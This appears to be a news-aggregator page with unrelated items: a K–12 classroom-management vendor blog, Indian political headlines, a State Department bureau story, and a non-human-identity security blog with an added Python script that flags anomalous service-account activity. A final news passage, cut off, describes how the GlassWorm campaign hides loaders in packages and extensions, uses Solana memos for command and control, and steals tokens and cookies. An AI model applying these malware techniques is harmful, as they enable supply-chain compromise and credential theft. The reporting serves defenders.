Technology

Related News

How Modern Classroom Management Tools Help Teachers Reclaim Instructional Time

  • Published date: 2026-03-26 00:00:00

<p>Technology has transformed modern classrooms, opening the door to more interactive and collaborative learning experiences. However, it has also introduced new challenges for teachers. Student devices are essential for digital learning, but can quickly become sources of distraction during instruction, pulling attention away from lessons and disrupting classroom flow.</p><p>Without the right support, teachers often lose valuable instructional time redirecting attention, monitoring screens, and managing off-task behavior. These small interruptions add up, making it harder to maintain momentum and keep students engaged.</p><p>Modern <a href="https://managedmethods.com/blog/product-update-classroom-manager-google-classroom-management/">classroom management tools</a> for teachers are designed to solve this problem. By giving educators better visibility into student activity and simple ways to guide focus, these tools help reduce disruptions and create more productive learning environments.</p><p>In this blog, we’ll explore how classroom management tools help teachers reclaim instructional time, and what to look for when evaluating the best classroom management and student engagement tools from edtech vendors.</p><p><strong>Key Points</strong></p><ul class="wp-block-list"> <li>Student devices enhance learning, but also introduce constant digital distractions</li> <li>Small disruptions quickly add up, reducing valuable instructional time</li> <li>Teachers need better visibility and control without added complexity</li> <li>Classroom management tools help minimize distractions and keep students focused</li> <li>Real-time monitoring and simple controls improve classroom efficiency</li> <li>The best classroom management tools for teachers support instruction, not interrupt it</li> </ul><h2 class="wp-block-heading" id="h-the-growing-challenge-of-digital-distractions-in-the-classroom-nbsp">The Growing Challenge of Digital Distractions in the Classroom </h2><p>One-to-one 
device programs have become increasingly common in K–12 schools, with many districts providing every student access to a Chromebook, tablet, or laptop. These initiatives have expanded opportunities for digital learning, enabling real-time collaboration, personalized instruction, and access to a wide range of online resources. However, with constant device access also comes greater potential for distraction, making it more challenging for teachers to keep students focused during instructional time.</p><p>With constant access to the internet, students are only a click away from distractions like online games, social media platforms, video content, and unrelated web browsing. Even during structured lessons, it’s easy for students to drift off-task without immediate visibility or guidance. These distractions may seem minor in isolation, but they can quickly disrupt focus, reduce engagement, and impact overall learning outcomes. This is especially chaotic when multiple students are off-task at the same time.</p><p>Even brief moments of distraction can have a cumulative impact on instructional time. When a teacher has to pause a lesson to redirect a student, address off-task behavior, or regain the class’s attention, it interrupts the flow of instruction. Over the course of a single class period or an entire school day, these small disruptions add up, reducing the time available for meaningful teaching and learning.</p><p>At the same time, teachers are expected to actively monitor student device use while delivering instruction, answering questions, and managing the classroom. This balancing act can be overwhelming without the right support. 
Instead of focusing fully on teaching, educators are often forced to split their attention between instruction and supervision.</p><p>Without effective classroom management tools for teachers, managing digital distractions can pull educators away from what matters most: delivering engaging lessons and supporting student success.</p><h2 class="wp-block-heading" id="h-what-are-classroom-management-tools-for-teachers">What Are Classroom Management Tools for Teachers?</h2><p>Classroom management tools for teachers are software solutions designed to help educators effectively manage student device use during instruction. As technology becomes more embedded in daily learning, these tools give teachers the ability to monitor and guide how devices are being used in real time, ensuring they support, not distract from, the lesson. 
Classroom management tools for teachers might include:</p><ul class="wp-block-list"> <li>Screen monitoring tools for real-time class supervision</li> <li>Website and app control tools to block or limit access</li> <li>Screen sharing tools to broadcast a screen or share student work</li> <li>Device locking tools that can pause student devices</li> <li>Messaging and alert tools to communicate with students during class</li> <li>Tab and browser management tools to keep students on task</li> <li>Device management platforms to control settings and permissions</li> <li>Behavior tracking tools for rewards and parent reports</li> </ul><p>At their core, classroom management tools help teachers maintain student focus without constant redirection. Instead of repeatedly pausing instruction to address off-task behavior, educators can use these tools to proactively keep students engaged, creating a more structured and productive learning environment.</p><h3 class="wp-block-heading" id="h-core-capabilities-nbsp">Core Capabilities </h3><p><strong>Real-Time Student Screen Visibility: </strong>Teachers can view student device activity as it happens, giving them immediate insight into who is on-task and who may be distracted. This eliminates guesswork and allows educators to quickly identify issues without interrupting the flow of instruction.</p><p><strong>Ability to Redirect or Limit Online Activity:</strong> Modern classroom management tools allow teachers to restrict access to certain websites or apps during class time. If a student navigates away from the assigned task, teachers can easily redirect them, helping minimize distractions and keep learning on track.</p><p><strong>Tools to Guide Attention During Lessons: </strong>These tools make it easier to direct student focus when it matters most. 
Teachers can guide students to specific resources, highlight key content, or ensure everyone is following along with the lesson, creating a more unified and engaged classroom experience.</p><p><strong>Quick Ways to Regain Classroom Focus: </strong>When distractions do occur, teachers need fast, simple ways to bring attention back to the lesson. Classroom management tools provide immediate controls that help refocus students without disrupting instruction, allowing teachers to maintain momentum and maximize instructional time.</p><h2 class="wp-block-heading" id="h-4-ways-modern-classroom-management-tools-reclaims-instructional-time">4 Ways Modern Classroom Management Tools Reclaim Instructional Time</h2><h3 class="wp-block-heading" id="h-1-real-time-visibility-into-student-activity-nbsp">1. Real-Time Visibility Into Student Activity </h3><p>One of the most impactful ways classroom management tools for teachers help reclaim instructional time is through real-time visibility into student activity. Instead of guessing who is on-task or walking around the classroom to check screens, teachers can instantly see what students are doing on their devices from a single view.</p><p>This immediate insight eliminates time-consuming monitoring and allows teachers to quickly identify and address off-task behavior. As a result, educators can spend less time policing device use and more time focused on delivering instruction and supporting student learning.</p><h3 class="wp-block-heading" id="h-2-reducing-digital-distractions">2. Reducing Digital Distractions</h3><p>Another key way classroom management tools help teachers reclaim instructional time is by reducing digital distractions before they escalate. 
With the ability to limit access to non-educational websites or apps during lessons, teachers can create a more focused digital learning environment.</p><p>By proactively keeping students on the right content, these tools help maintain attention on learning activities and prevent small distractions from turning into larger classroom disruptions. This means fewer interruptions, smoother lessons, and more time spent on meaningful instruction.</p><h3 class="wp-block-heading" id="h-3-refocusing-students-quickly-nbsp">3. Refocusing Students Quickly </h3><p>Modern classroom management tools for teachers make it easy to quickly refocus students without disrupting the flow of a lesson. With simple, intuitive controls, teachers can redirect student screens back to the appropriate content in just a few clicks.</p><p>This ability to act quickly helps maintain instructional momentum and minimizes time spent addressing off-task behavior. Instead of pausing to manage distractions, teachers can seamlessly guide students back on track and keep the lesson moving forward.</p><h3 class="wp-block-heading" id="h-4-supporting-student-engagement-nbsp">4. Supporting Student Engagement </h3><p>Effective classroom management tools do more than reduce distractions. They actively support student engagement. By keeping students focused on assigned tasks and minimizing opportunities for off-task behavior, these tools help create a more structured and attentive learning environment.</p><p>As a result, teachers can spend more time teaching and less time troubleshooting distractions. 
This shift not only improves the flow of instruction but also boosts overall classroom productivity, allowing both teachers and students to make the most of every learning moment.</p><h2 class="wp-block-heading" id="h-how-to-find-the-best-classroom-management-and-student-engagement-tools-from-edtech-vendors">How to Find the Best Classroom Management and Student Engagement Tools from EdTech Vendors</h2><p>When evaluating the best classroom management and student engagement tools from edtech vendors, schools should prioritize solutions that are both simple and effective. The right tools should support teachers in the classroom without adding complexity, ensuring they are easy to use while delivering meaningful impact on focus and instructional time.</p><h3 class="wp-block-heading" id="h-key-features-to-look-for">Key Features to Look For</h3><ul class="wp-block-list"> <li>Real-time visibility into student device activity</li> <li>Easy-to-use controls for teachers</li> <li>Quick setup without complex installations</li> <li>Tools designed specifically for K–12 classrooms</li> <li>Integration with existing school technology environments</li> </ul><p>The best classroom management tools for teachers are designed to support instruction, not complicate it. They should be intuitive for educators to use with minimal training, while also being easy for IT teams to deploy and manage across the district. 
Solutions that require complex setups, constant maintenance, or steep learning curves can create more challenges than they solve. Instead, schools should look for tools that seamlessly fit into existing workflows, helping teachers manage digital learning environments effectively without adding extra burden on their day or on IT resources.</p><h2 class="wp-block-heading" id="h-how-classroom-management-tools-improve-the-teaching-experience-nbsp">How Classroom Management Tools Improve the Teaching Experience </h2><h3 class="wp-block-heading" id="h-benefits-for-teachers-nbsp">Benefits for Teachers </h3><p>Modern classroom management tools for teachers are designed to make daily instruction smoother, not more complicated. One of the biggest advantages is the ability for teachers to block or allow specific URLs based on their lesson needs, without having to rely on IT teams. This flexibility empowers educators to quickly adapt to different activities, projects, or teaching moments in real time.</p><p>These tools also help reduce classroom interruptions by minimizing off-task behavior before it escalates. With fewer distractions to manage, teachers can maintain lesson flow and spend more time focused on instruction rather than redirection. As a result, educators experience less stress when managing student devices and feel more in control of their digital classrooms.</p><p>Over time, this leads to greater confidence in using technology as part of everyday teaching. Instead of viewing devices as a challenge to manage, teachers can leverage them as effective learning tools that enhance engagement and support better outcomes.</p><h3 class="wp-block-heading" id="h-benefits-for-students">Benefits for Students</h3><p>Modern classroom management tools don’t just support teachers; they also create a better learning experience for students. 
By minimizing distractions and keeping device use aligned with the lesson, these tools help establish more focused learning environments where students can fully engage with the material.</p><p>They also provide clear expectations around how devices should be used during class. When students understand boundaries and stay on task, it reduces confusion and creates a more structured, productive classroom. As a result, students are more engaged during instruction, better able to follow along, and more likely to retain what they’ve learned.</p><h3 class="wp-block-heading" id="h-benefits-for-it-teams-nbsp">Benefits for IT Teams </h3><p>The right classroom management tools for teachers also reduce the burden on IT teams. When teachers can independently allow or block URLs for specific lessons or student needs, it significantly decreases the number of support tickets related to access requests or student device issues. That delegation should still be bounded: a teacher’s allow action should apply only to their own classes and sessions and should be logged, so that district-level filtering policy is not silently overridden. This self-service capability helps streamline day-to-day operations across the district.</p><p>With fewer routine requests to manage, IT teams can shift their focus and energy toward higher-priority initiatives rather than handling constant classroom-level adjustments. This includes improving infrastructure, strengthening security, and supporting broader technology goals.</p><h2 class="wp-block-heading" id="h-reclaim-instructional-time-with-the-right-classroom-management-tools-nbsp">Reclaim Instructional Time With the Right Classroom Management Tools </h2><p>Effective classroom technology should support teachers, not create additional work. 
The right classroom management tools for teachers simplify the challenges of managing digital learning environments by reducing distractions, streamlining classroom control, and keeping students focused and engaged.</p><p>When schools invest in <a href="https://managedmethods.com/blog/k12-classroom-management-and-content-filtering/">the best classroom management and student engagement tools from edtech vendors</a>, they empower educators to spend less time managing devices and more time delivering impactful instruction. Ultimately, that means more productive classrooms, stronger learning outcomes, and more time for teachers to focus on what matters most: helping students succeed.</p><p><a href="https://managedmethods.com/products/classroom-manager/">Classroom Manager</a> by ManagedMethods brings these capabilities together in a simple, teacher-friendly solution built specifically for K–12 environments. With real-time visibility, easy-to-use controls, and seamless deployment, it helps educators reduce distractions, keep students focused, and reclaim valuable instructional time. It does so without adding complexity for teachers or IT teams. Ready to see the difference for yourself? 
Learn more about Classroom Manager and experience it in action by <a href="https://managedmethods.com/schedule-a-demo/">booking a free proof-of-concept</a> today.</p><p>The post <a href="https://managedmethods.com/blog/how-modern-classroom-management-tools-help-teachers-reclaim-instructional-time/">How Modern Classroom Management Tools Help Teachers Reclaim Instructional Time</a> appeared first on <a href="https://managedmethods.com/">ManagedMethods Cybersecurity, Safety &amp; Compliance for K-12</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://managedmethods.com/feed/">ManagedMethods Cybersecurity, Safety &amp; Compliance for K-12</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alexa Sander">Alexa Sander</a>. Read the original post at: <a href="https://managedmethods.com/blog/how-modern-classroom-management-tools-help-teachers-reclaim-instructional-time/">https://managedmethods.com/blog/how-modern-classroom-management-tools-help-teachers-reclaim-instructional-time/</a></p>

PM Modi remains world's most popular leader, says study by US firm

  • TNN
  • Published date: 2026-03-25 23:56:50

Prime Minister Narendra Modi has once again been recognized as the world's most popular democratic leader, achieving a 68% approval rating in a recent Morning Consult survey. This significant endorsement highlights his strong public support, even as it shows …


12 lakh Bengal voter claims rejected out of 32L vetted, says EC official

  • TNN
  • Published date: 2026-03-25 23:52:37

Bengal's electoral rolls saw a significant reduction of approximately 12 lakh voters after judicial officers cleared just over half of the 60 lakh pending cases. This has led to widespread disenfranchisement in several rural pockets, with many long-term resid…


KSOU defies K’taka govt order, hosts Deendayal conclave

  • TNN
  • Published date: 2026-03-25 23:52:00

Mysuru: A conclave to mark 60 years of the lectures of RSS ideologue Deendayal Upadhyaya at the Karnataka State Open University (KSOU) campus here has.


'It's not must': SC nixes plea against Vande Mataram circular

  • Dhananjay Mahapatra
  • Published date: 2026-03-25 23:29:06

Raza Academy president Muhammed Sayed Noori has challenged the Centre's order for schools to begin the day with the national song 'Vande Mataram' in the Supreme Court. He argued that compelling students to sing the song, which invokes Hindu deities, infringes…


Amid oppn protest, FCRA amendment bill tabled in Lok Sabha

  • TNN
  • Published date: 2026-03-25 23:23:25

The government introduced the Foreign Contribution (Regulation) Amendment Bill, 2026, in Lok Sabha, facing opposition from Congress and TMC who voiced concerns over executive overreach. Minister of State for Home Nityanand Rai countered, stating the bill targ…


PG admission row: Petitioner contacts CJI kin amid SC heat

  • TNN
  • Published date: 2026-03-25 23:20:05

Supreme Court Chief Justice Surya Kant revealed a petitioner contacted his brother, allegedly to influence recusal from a case involving a brother-sister duo converting to Buddhism for minority quota PG medical admissions. The CJI stated he would not recuse a…


India tightens digital security with strict rules

  • TNN
  • Published date: 2026-03-25 23:06:33

India has bolstered its digital security by mandating stricter compliance for telecom equipment, CCTV systems, and data protection. This move addresses concerns over surveillance infrastructure vulnerabilities and espionage risks, particularly with imported e…


How to Keep ICE Agents Out of Your Devices at Airports

  • Nikita Mazurov
  • Published date: 2026-03-25 12:14:35

If you’re traveling, follow these digital security practices to keep federal authorities from getting into your phone. The post How to Keep ICE Agents Out of Your Devices at Airports appeared first on The Intercept.

With Immigration and Customs Enforcement agents deployed to more than a dozen airports across the U.S. and border device searches growing increasingly common, it’s more important than ever to consider… [+6224 chars]

Sunrise and Sunset Time on March 26, 2026: Worship Lord Surya and perform kanya pujan on ashtami tithi

  • Mahima Sharma
  • Published date: 2026-03-25 11:02:03

Chaitra Durga Ashtami will be celebrated tomorrow, March 26, 2026. This auspicious day is dedicated to worshipping Mahagauri Maa. Devotees will perform kanya pujan, inviting young girls and offering them sattvik food. The day also involves worshipping Lord Su…


State Department Launches New Bureau to Combat High-Tech Threats

  • Jon Swartz
  • Published date: 2026-03-25 00:00:00


<p>The State Department has officially operationalized the Bureau of Emerging Threats (ET), a high-stakes unit designed to shield American interests from the weaponization of advanced technology by foreign adversaries.</p><p>The bureau’s launch marks the culmination of a sweeping reorganization plan introduced nearly a year ago by Secretary of State Marco Rubio. While its existence was previously known, officials have now revealed the specific architecture of the agency, which is tasked with countering sophisticated threats from China, Russia, North Korea, Iran, and international terrorist organizations.</p><p>Led by senior career diplomat Anny Vu, formerly the U.S. chargé d’affaires to China, the bureau will leverage foreign policy to mitigate risks that “blur the line between peace and conflict.” The agency is structured into five specialized offices: cybersecurity, critical infrastructure security, disruptive technology targeting artificial intelligence (AI) and quantum computing, space security, and threat assessment.</p><p>“The bureau will address not only the current threats we face today in cyberspace and outer space… but those we will face in the decades ahead,” said State Department spokesperson Tommy Pigott.</p><p>The rollout follows a surge in digital hostilities. Experts at CrowdStrike Inc. have noted a significant uptick in pro-Iranian cyber activity following military escalations in February. Separately, the Cybersecurity and Infrastructure Security Agency (CISA) is currently investigating a major breach of the medical technology firm Stryker, believed to be the work of Iranian-linked hackers.</p><p>The bureau’s activation coincides with a new White House national policy framework for AI. 
This four-page blueprint urges Congress to adopt “minimally burdensome” federal laws to preempt restrictive state-level regulations, while explicitly advising against the creation of new federal agencies dedicated solely to AI regulation.</p><p>While the State Department has yet to disclose the bureau’s exact budget or staffing levels, officials emphasize a shift toward proactive diplomacy. Rather than merely reacting to breaches, the ET Bureau is designed to anticipate how emerging technologies might be used for espionage or sabotage before they reach a crisis point.</p><p>The bureau currently reports to the Under Secretary for Arms Control and International Security, signaling that the U.S. now views bits, bytes, and orbital assets as central to the modern arms race.</p>

Is your AI security scalable?

  • Published date: 2026-03-25 00:00:00

<h2>What Does Scalable AI Security Mean for Non-Human Identities?</h2><p>As organizations move more of their workloads to the cloud, the question becomes: how well equipped is your AI security to handle a growing population of Non-Human Identities (NHIs)? NHIs, or machine identities, have become pivotal assets in protecting data and systems from unauthorized access.</p><h3>Understanding Non-Human Identities</h3><p>NHIs are the machine identities that secure digital interactions between systems. Each NHI is created by combining a “secret” (a credential such as a password, API token, or key) with the permissions a server grants it, akin to a passport with a visa. This concept is vital for organizations aiming to protect assets.</p><p>The task of managing NHIs involves comprehensive oversight of the entire lifecycle, including discovery, classification, threat detection, and remediation. Unlike traditional point solutions, this all-encompassing approach offers a definitive edge, providing deeper insights into ownership, permissions, usage patterns, and potential vulnerabilities.</p><h3>The Strategic Significance of Scalable AI Security</h3><p>For organizations across industries such as financial services, healthcare, and DevOps, the strategic implementation of scalable AI security is imperative. 
Here’s why:</p><ul> <li><strong>Reduced Risk:</strong> By proactively identifying security risks, NHI management minimizes the likelihood of breaches.</li> <li><strong>Enhanced Compliance:</strong> Automating policy enforcement and maintaining audit trails helps organizations meet compliance requirements efficiently.</li> <li><strong>Operational Efficiency:</strong> Automation within NHI management allows teams to focus on strategic initiatives, driving efficiency.</li> <li><strong>Improved Visibility:</strong> A centralized view of management and governance facilitates enhanced control over access.</li> <li><strong>Cost Savings:</strong> Automation of secrets rotation and decommissioning of NHIs helps cut operational costs significantly.</li> </ul><h3>Bridging the Gap Between Security and R&amp;D Teams</h3><p>A common challenge in organizations is the disconnect between security and R&amp;D teams. By implementing robust NHI management, this gap can be addressed effectively. The <a href="https://entro.security/blog/non-human-identities-security-in-healthcare/">secure management of NHIs in healthcare</a> is a prime example of how various sectors can benefit from this strategic alignment.</p><p>NHI management also fosters a collaborative atmosphere where security is integrated into the development lifecycle, empowering teams to innovate without compromising secure scaling.</p><h3>A Data-Driven Approach to Secure Scaling</h3><p>Incorporating a data-driven strategy in scalable AI security is essential. Businesses must harness data analytics to predict potential vulnerabilities and address them before they escalate. The ability to analyze and act on insights regarding NHIs strengthens a company’s security posture considerably, enabling secure scaling of AI systems across platforms.</p><p>By leveraging machine learning and AI, organizations can automate the management of NHIs and secrets, which translates to more efficient and adaptive security measures. 
An exemplary case is how companies like Elastic scale their secrets and NHI security, as outlined in <a href="https://entro.security/blog/how-elastic-scaled-secrets-nhi-security-elastics-playbook-from-visibility-to-automation/">Elastic’s playbook from visibility to automation</a>.</p><h3>Relevance Across Industries</h3><p>While the need for scalable AI security is universal, the specifics vary across sectors. For instance, in the financial services sector, protecting NHIs is crucial because of the sensitive data they handle. In healthcare, it’s about safeguarding patient information and ensuring compliance with regulations like HIPAA.</p><p>Travel and SOC teams, on the other hand, require meticulous access management and continuous monitoring of NHIs due to the dynamic nature of their operations. These industry-specific needs underline the importance of a versatile approach to secure scaling.</p><p>In conclusion, as organizations increasingly operate in cloud environments, the integration of scalable AI security with robust NHI management is no longer optional; it’s a necessity. Addressing the complexities of machine identities and secrets through a comprehensive methodology empowers businesses to innovate securely, ensuring both compliance and risk reduction.</p><p>Stay tuned for the continuation of this exploration into the strategic implementation of scalable AI security.</p><h3>The Imperative of Continuous Monitoring</h3><p>Why is continuous monitoring a cornerstone for managing NHIs? It plays an indispensable role in identifying and mitigating threats in real time, so that unauthorized activity is far less likely to go unnoticed. Such vigilance is crucial for maintaining the integrity of systems that depend on NHIs.</p><p>Traditional methods of securing identities were reactive, addressing threats after a breach. With the dynamic risks associated with NHIs, a proactive approach is necessary. 
Continuous monitoring serves as an early warning system, highlighting anomalies in behavior patterns and unusual access requests. This real-time oversight allows teams to tackle potential security breaches before they manifest, safeguarding organizations against substantial losses and reputational damage.</p><p>Moreover, continuous monitoring aids compliance efforts by providing a comprehensive audit trail. It serves as documented proof of an organization’s proactive security stance, making compliance with regulations such as GDPR, HIPAA, and others more attainable.</p><h3>Building a Culture of Security</h3><p>Can organizations build a culture of security where every team understands and participates in maintaining NHI security? The answer is a resounding yes, though it requires a concerted effort to foster collaboration and communication among all departments.</p><p>The synergy between security teams and other departments, particularly R&amp;D, is crucial for a robust security culture. This collaboration ensures that security measures are seamlessly integrated into the development processes, rather than being an afterthought. The implementation of security measures at each stage of development not only strengthens the overall security posture but also empowers teams to innovate with peace of mind, knowing they are not compromising on safety.</p><p>To further embed this culture, organizations should invest in continuous training and awareness programs tailored to specific roles. By deepening their understanding of NHIs and the significance of managing these digital identities, employees across all levels can contribute to an organization’s cybersecurity resilience. Implementing gamified security training can make learning more engaging and impactful.</p><h3>The Role of AI and Machine Learning</h3><p>How do AI and machine learning revolutionize the way organizations manage NHIs? 
They bring automation and intelligent analysis to the forefront, transforming the approach from manual and reactive to automated and predictive.</p><p>AI can process vast amounts of data quickly, detecting patterns and anomalies that may indicate a security breach. Machine learning algorithms learn from each interaction, becoming more accurate in predicting and identifying threats as they evolve. This predictive capacity is crucial for fortifying systems against emerging threats and ensuring NHIs remain secure.</p><p>Furthermore, AI-driven solutions can automate routine tasks such as secrets rotation and identity verification, freeing up valuable resources for more strategic initiatives. This not only maximizes operational efficiency but also minimizes the risk of human error, which is often a vulnerability in cybersecurity protocols.</p><p>Given these capabilities, it’s no surprise that organizations leveraging AI and machine learning in their NHI management strategies are better positioned to preempt threats and operate securely.</p><h3>Future-Ready Solutions for Comprehensive Security</h3><p>What does it take for businesses to stay ahead? Future-ready solutions that adapt to evolving threats are paramount. Organizations must be prepared to scale their security operations in tandem with their business growth, ensuring that all machine identities and secrets are protected, regardless of size or complexity.</p><p>Incorporating an adaptable security framework is essential. This includes deploying security solutions that can be fine-tuned to meet specific industry requirements and scale up or down as necessary. Solutions must accommodate new technologies and platforms, integrating smoothly into existing systems to prevent security gaps.</p><p>Moreover, the shift toward using decentralized systems and infrastructures such as blockchain can enhance security by reducing single points of failure. 
While exploring these technologies, businesses should ensure that NHIs are adequately managed and secured within these networks.</p><p>Lastly, fostering partnerships with industry experts and participating in collaborative platforms can provide essential insights into best practices and emerging trends. For example, organizations can benefit from collaborative research efforts, as detailed in the <a href="https://entro.security/blog/agentic-ai-owasp-research/">Agentic AI OWASP research</a> on emerging security technologies.</p><h3>The Strategic Path Forward</h3><p>Addressing the complexities of managing non-human identities is a multi-faceted challenge that requires a strategic, comprehensive approach. The integration of scalable AI security and NHI management empowers businesses to not only protect their digital assets but also innovate securely—a necessary balance.</p><p>As the demand for robust, adaptable, and efficient security solutions continues to grow, the adoption of cutting-edge technologies and methodologies becomes imperative. This ongoing evolution necessitates staying informed, vigilant, and prepared to adapt at a moment’s notice. 
Organizations must continue to refine their strategies, incorporating insights from data-driven analyses, to successfully navigate the intricate web of non-human identities and remain secure.</p><p>Explore more about these strategies and how they can be applied within your organization by visiting our insights on <a href="https://entro.security/blog/entro-wiz-integration/">NHI management and cloud integrations</a> and our experience in AI in security professions.</p><p>The post <a href="https://entro.security/is-your-ai-security-scalable/">Is your AI security scalable?</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/is-your-ai-security-scalable/">https://entro.security/is-your-ai-security-scalable/</a> </p>
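The post above describes continuous monitoring of NHIs as an early-warning system that flags anomalous behaviour and unusual access requests, and automation that rotates or decommissions secrets. The following is an added example, written for this page and not code from Entro or the original post, of the minimal form both checks take: a per-identity baseline built from past audit events, deviation alerts over new events, and a list of identities idle long enough to be decommissioning candidates. The log format, the identity names, the IP addresses and the 60-day idle threshold are all assumptions made for the example.

```python
"""Baseline-and-deviation monitoring for non-human identities (NHIs).

Added example, not code from Entro or the original post. The log format,
identity names, addresses and thresholds are assumptions for illustration.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one JSON audit event per line. "principal" is the NHI
# (service account / API key), "src" the caller address, "action" the API call.
BASELINE_LOG = """
{"ts":"2026-03-01T08:00:00Z","principal":"svc-billing","action":"s3:GetObject","src":"10.1.2.3"}
{"ts":"2026-03-02T08:05:00Z","principal":"svc-billing","action":"s3:GetObject","src":"10.1.2.4"}
{"ts":"2026-03-03T08:01:00Z","principal":"svc-billing","action":"s3:PutObject","src":"10.1.2.3"}
{"ts":"2026-03-01T09:00:00Z","principal":"ci-deployer","action":"ecr:PutImage","src":"10.9.0.7"}
{"ts":"2026-01-10T12:00:00Z","principal":"legacy-report-key","action":"s3:GetObject","src":"10.1.5.5"}
"""

RECENT_LOG = """
{"ts":"2026-03-24T08:02:00Z","principal":"svc-billing","action":"s3:GetObject","src":"10.1.2.3"}
{"ts":"2026-03-24T03:17:00Z","principal":"svc-billing","action":"iam:CreateAccessKey","src":"203.0.113.9"}
{"ts":"2026-03-24T09:00:00Z","principal":"ci-deployer","action":"ecr:PutImage","src":"10.9.0.7"}
"""


def parse_log(text):
    """Parse newline-delimited JSON events; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            ev = json.loads(line)
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(ev)
    return events


def build_baseline(events):
    """Per-identity set of actions and source /24s seen, plus last use."""
    baseline = defaultdict(lambda: {"actions": set(), "srcs": set(), "last_seen": None})
    for ev in events:
        b = baseline[ev["principal"]]
        b["actions"].add(ev["action"])
        b["srcs"].add(ev["src"].rsplit(".", 1)[0])  # /24 prefix (assumption)
        if b["last_seen"] is None or ev["ts"] > b["last_seen"]:
            b["last_seen"] = ev["ts"]
    return baseline


def find_anomalies(baseline, events):
    """Return (principal, reason, event) for behaviour outside the baseline.

    An unknown principal, a never-before-seen action, or a new source /24
    each yield a finding; the returned list doubles as the audit trail.
    """
    findings = []
    for ev in events:
        b = baseline.get(ev["principal"])
        if b is None:
            findings.append((ev["principal"], "unknown identity", ev))
            continue
        if ev["action"] not in b["actions"]:
            findings.append((ev["principal"], f"new action {ev['action']}", ev))
        if ev["src"].rsplit(".", 1)[0] not in b["srcs"]:
            findings.append((ev["principal"], f"new source {ev['src']}", ev))
    return findings


def stale_identities(baseline, events, now, max_idle_days=60):
    """Identities with no activity in max_idle_days: rotate or decommission."""
    last = {p: b["last_seen"] for p, b in baseline.items()}
    for ev in events:
        if ev["principal"] not in last or ev["ts"] > last[ev["principal"]]:
            last[ev["principal"]] = ev["ts"]
    cutoff = now - timedelta(days=max_idle_days)
    return sorted(p for p, ts in last.items() if ts < cutoff)


def run(now=datetime(2026, 3, 25)):
    """Build the baseline from the old log and evaluate the recent log."""
    baseline = build_baseline(parse_log(BASELINE_LOG))
    recent = parse_log(RECENT_LOG)
    return find_anomalies(baseline, recent), stale_identities(baseline, recent, now)


if __name__ == "__main__":
    anomalies, stale = run()
    for principal, reason, ev in anomalies:
        print(f"ALERT {ev['ts'].isoformat()} {principal}: {reason}")
    print("stale identities:", stale)
```

On the constructed input the 03:17 event is flagged twice, once for the action (a service account that only ever read and wrote objects suddenly minting an access key) and once for the source address, while `legacy-report-key`, last seen in January, is listed for decommissioning. A production version would key the baseline on more than action and /24 (time of day, target resource, token age), but the shape is the same.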

An Evolving GlassWorm Malware is Making the Rounds of Code Repositories

  • Jeffrey Burt
  • Published date: 2026-03-25 00:00:00

None

<p>Threat researchers at various vendors have spent the past year tracking a threat actor dubbed GlassWorm, known for dropping malicious packages and extensions in registries like npm, Open VSX, PyPI, and Microsoft’s Visual Studio Marketplace with the aim of stealing secrets and cryptocurrency.</p><p>This month, threat researchers wrote about a resurgence in activity by an evolved GlassWorm that includes new features and capabilities, including the ability to drop a remote access trojan (RAT), a focus on Model Context Protocol (MCP) servers, and what Socket analysts called a “significant escalation in how it spreads through Open VSX.” These join features already known about GlassWorm, including the use of hidden Unicode characters to compromise GitHub repositories.</p><p>Aikido Security researchers found a multi-stage framework that installs a persistent RAT and a further capability to force-install a Chrome extension dressed up to look like Google Docs Offline.</p><p>GlassWorm now “logs keystrokes, dumps cookies and session tokens, captures screenshots, and takes commands from a C2 server hidden in a Solana blockchain memo,” Aikido malware researcher Ilyas Makari <a href="https://www.aikido.dev/blog/glassworm-chrome-extension-rat" target="_blank" rel="noopener">wrote in a report</a>.</p><p>A Koi security researcher wrote that in this fifth wave of GlassWorm attacks, the threat actor is using its <a href="https://www.koi.ai/blog/glassworm-hits-mcp-5th-wave-with-new-delivery-techniques" target="_blank" rel="noopener">invisible Unicode tactic with MCP servers</a>, along with GitHub repositories and hundreds of extensions.</p><p>For their part, Socket researchers wrote about how the malware now <a href="https://socket.dev/blog/open-vsx-transitive-glassworm-campaign" target="_blank" rel="noopener">moves through Open VSX</a>.</p><h3>Same Tradecraft, Better Evasion</h3><p>“Instead of requiring every malicious listing to embed the loader directly, the threat 
actor is now abusing extensionPack and extensionDependencies to turn initially standalone-looking extensions into transitive delivery vehicles in later updates, allowing a benign-appearing package to begin pulling a separate GlassWorm-linked extension only after trust has already been established,” the Socket researchers wrote.</p><p>The threat actor has kept the core GlassWorm tradecraft but has improved the malware’s ability to evade detection, they wrote.</p><p>“The newer variants still use staged JavaScript execution, Russian locale/timezone geofencing, Solana transaction memos as dead drops, and in-memory follow-on code execution, but they now rotate infrastructure and loader logic more aggressively,” the Socket researchers wrote.</p><h3>Finding the RAT</h3><p>The first stage of the latest GlassWorm variant seen by Aikido is similar to previous ones, according to Makari. The threat actor publishes malicious packages across npm, PyPI, GitHub, and Open VSX, both creating new packages and compromising maintainer accounts to push malicious versions of legitimate projects.</p><p>The variants use either an invisible Unicode loader – a technique researchers outlined last year – or a conventional obfuscated preinstall script, and both share the same Solana blockchain command-and-control (C2) beacon.</p><p>“The loader polls in a 10-second loop until it finds a transaction with a non-null memo field,” he wrote. “Solana’s memo feature was designed to add annotations to transactions, but here it functions as a covert dead-drop. 
